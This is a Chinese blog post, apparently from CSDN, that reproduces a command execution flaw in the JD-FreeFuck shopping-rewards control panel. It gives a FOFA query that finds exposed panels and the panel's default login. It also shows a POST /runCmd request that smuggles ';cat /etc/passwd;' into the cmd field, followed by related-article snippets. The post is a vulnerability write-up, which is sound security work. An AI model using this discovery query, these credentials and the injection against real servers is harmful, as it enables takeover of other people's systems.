JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞

最新推荐文章于 2023-06-13 06:00:00 发布
最新推荐文章于 2023-06-13 06:00:00 发布
阅读量2.3k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35938621/article/details/124356729
版权

漏洞描述

i ⭐JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址: https://github.com/meselson/JD-FreeFuck

漏洞影响

s ✅JD-FreeFuck

空间测绘

d ⭕FOFA:title="京东薅羊毛控制面板"

漏洞复现

  • 访问后登录页面如下

image-20220422224258613

  • ✅ 默认账号useradmin/supermanito
POST /runCmd HTTP/1.1

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

image-20220422224428337

个人博客

孤桜懶契:https://gylq.gitee.io/time

孤桜懶契
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
JD-FreeFuck 后台RCE漏洞
weixin_51387754的博客
11-05 8336
漏洞简介 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞漏洞复现 fofa语法
JD-FreeFuck 后台命令执行漏洞
tomyyyyy
04-14 1万+
JD-FreeFuck 后台命令执行漏洞 漏洞说明 JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址:https://github.com/meselson/JD-FreeFuck 环境搭建 脚本一键部署: bash <(curl -sSL https://gitee.com/mjf521/JD-FreeFuck/r...
JD-FreeFuck:《京东薅羊毛》一键部署脚本
03-27
2021/1/11通知:活动列表有所变化,已部署的朋友请执行最新的更新一键更新脚本命令教程在下方第四部分第3条。 《京东薅羊毛》一键部署脚本对于Linux 用途:通过参与京东商城的各种活动白嫖京豆,目前每个账号日均100〜200京豆 适用系统:Ubuntu 20&CentOS 8简体中文 Ubuntu正在完善中,但现在仍可用,建议优先使用Ubuntu系统 CentOS本人测试环境为最新的CentOS 8.3,不适用7及以上版本,系统装完后联网即可,如果是最小化安装,请通过SSL方式进入到终端 原作者GitHub项目地址: 此项目核心JavaScript京东活动脚本原作者 此项目Linux环境原作者,已授权,在其问题中有分帖 下面进入正题,部署教程共三步,请认真阅读下面的内容 一,环境一键部署 的Ubuntu wget --no-check-certificate -O install.
JD-FreeFuck:《 JD薅羊毛》一键部署用于Linux
02-20
如果您觉得这个项目不错的话可以在右上角给颗 :white_medium_star:吗?方便分享给更多的朋友吗? 通知与更新 2021/2/20通知(重要) 由于lxk0301更新了package.json,导致已部署的朋友所有脚本无法使用提示“请先获取JD账号”,请所有已部署的朋友根据《使用如何卸载此项目更新》中如何卸载此项目的第一条命令删除整个项目文件夹后重新一键部署!注意删除整个项目文件前请先备份您的Cookie,互助码等配置信息,配置文件config.sh已更新到最新的版本。 2021/2/11更新 关于环球挑战赛活动互助码的加入方法 2021/2/8更新 crontab.list了crontab.list定时配置文件目录不正确的问题, run-all.sh了run-all.sh一键执行所有活动脚本关于重复添加疯狂的JOY挂机活动的错误,删除了不该该键执行所有活动脚本中运行的活动,请所有朋友更新,更新命令位于下面的第
命令执行漏洞
realmels的博客
07-10 824
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub靶机渗透之Me and My Girlfriend XSS漏洞 文件上传漏洞 文件.
github_SuperManito_JD-FreeFuck
04-01
通知与更新更新代表有新的内容增加,您可以更新也可以继续使用之前的版本,不影响当前使用,除非说明需要重新部署修复代表有错误已经修复完毕需要您执行相关命令解决相应的问题,如有特殊命令需要执行会在维基首页...
FreeFuck
03-27
通知与更新更新代表有新的内容增加,您可以更新也可以继续使用之前的版本,不影响当前使用,除非说明需要重新部署修复代表有错误已经修复完毕需要您执行相关命令解决相应的问题,如有特殊命令需要执行会在维基首页...
02.青龙面板——薅京东羊毛,自动获取京豆、自动浇水、做任务
无奈清风吹过的博客
04-25 3万+
左侧菜单中选择订阅管理,然后点击新建添加按钮。在弹出的对话框中输入新建订阅的名称、仓库类型、仓库地址、定时,然后点击确定按钮。手动执行一次,拉取仓库脚本一会后点击查看日志,可以发现已经开始拉取脚本点击定时任务可以发现已经有很多任务了。
【奶奶看了都会】教你用Python 脚本薅京东签到羊毛
python03012的博客
05-06 1万+
【奶奶看了都会】教你用Python 脚本薅京东签到羊毛
jd_shell:京东羊毛jd Linux shell nodejs自动化
02-09
请仔细阅读和各文件注释,95%的问题都能找到答案 如有二次使用,请注明来源 本脚本是以下两个仓库的shell套壳工具: :主要是任务。 :主要是短期任务,一次性任务,正因为是短期的和一次性的,所以经常会有报错,报错就报错了,不要催我也不要去催大佬。 适用于以下系统 ArmBian / Debian / Ubuntu / OpenMediaVault / CentOS / Fedora / RHEL等Linux系统 OpenWRT 安卓 苹果系统 码头工人 说明 宠汪汪赛跑助力先让用户提供的各个账号之间相互助力,助力完成你提供的所有账号以后,再给我和lxk0301大佬助力,每个账号助力后可得得30g狗粮。 将部分临时活动修改为了我的邀请码,已取得lxk0301大佬的同意。 更新日志 只记录大的更新,小修小改不记录。 2021-01-30,由于E大和shy哥的仓库临时下线,我自己修
京东自动领京豆.js
05-21
本脚本基于auto.js编写,针对京东推出的各种领京豆活动,包括每日签到领京豆、美妆馆签到、宠物馆签到、美使馆签到等等。采用意图直接跳转的方式,出错率极低,每天至少可领20个京豆以上,连续签到更多
Docker_JD_In_GithubAction:京东薅羊毛GithubAction自动脚本
03-03
京东薅羊毛Github动作自动脚本 食用方法: 1.叉 2.修改docker-compose.yml文件,文件配置 3.手动运行.github / workflow / main.yml看日志是否正常输出 4.修改一次.github / workflow / keep-run-to-cron.yml文件并提交 5.最多6小时之内来看看动作是否由预定触发
FREERADIUS.net has a little FUCK
ENDLESS
04-01 8055
          星期五接到一个新任务,去学习 FREERADIUS.net。老师给我讲了一下验证(宽待的拨号验证)的一个大概流程,让我对FREERADIUS.net这个东西是做什么用有基本的了解。以前从未接触过这样的东西。开始以为不会有什么太大的问题,结果,这个东西在linux上的文档倒是很多,可是我们是要.net 的windows平台下的,google一下几乎找不到什么有价值的东西。下了一个
JD-FreeFuck 后台命令执行
最新发布
06-13 1277
见路不走,即见因果;见相非相,即见如来
TheFuck—Python写的超实用命令纠正工具
Python实用宝典网
12-28 516
The Fuck 是一款功能强大的、Python编写的应用程序,可用于纠正控制台命令中的错误,非常强大。此外,用户还可通过写Python代码的方式自定义修复规则。修复效果如下动图所示:更...
FUCK U
downfile911的专栏
07-05 708
<br />FFFFFFFFFFFFFFFFFFFFF
HEAP: Free Heap block XXXXXXXX modified at XXXXXXXX after it was freed
热门推荐
mons_xujingtao的博客
07-11 101万+
在有关于内存分配和释放的代码中,容易发生这种问题。这个问题的描述就是内存已经被释放了,后面还继续使用举个例子:float* distance = new float [dimension]; for(int k=0;k&lt;10;k++) {     for(int i=0;i&lt;dimension;i++)     {     distance[i]=0;     } delete[] d...
去掉FreeMind的红色波浪线,关闭拼写检查
What the Fuck
03-13 1860
最近又重新使用了FreeMind,于是在编辑注释时发现输入完的文本下面有一段很丑的波浪线,找了半天终于找到如何关闭了。 解决办法就是选择“工具”—>”首选项”—>语言标签栏中取消拼写检查去掉下面图中的勾选; 然后关闭FreeMind,重启打开就行了。 清爽了。
薅羊毛」青龙定时面板——京东活动
日常开发分享
11-26 8948
背景近日,圈子有一个大佬推荐给我一个可以自动定时完成京东各种活动任务的组件。他说,用了这个组件后啊,腰不酸了、腿不疼了,而且分分钟都有京豆、金币入账,一开始我还不相信,亲自体验后,果然没让...
JD薅羊毛青龙面板搭建最新版扫码教程第二步
Guang_Fu的博客
06-30 2万+
上一节我们学会了青龙2.2的搭建 第二节:青龙面板 扫码获取cookie 1.第一步 安装依赖 yum install wget unzip -y 2.第三步 后端安装 wget https://ghproxy.com/https://github.com/shufflewzc/JDC/releases/download/2.0.4/linux_amd64.zip && unzip linux_amd64.zip 3.赋777权限 安装 chmod 777 JDC ./JDC 4

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孤桜懶契

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值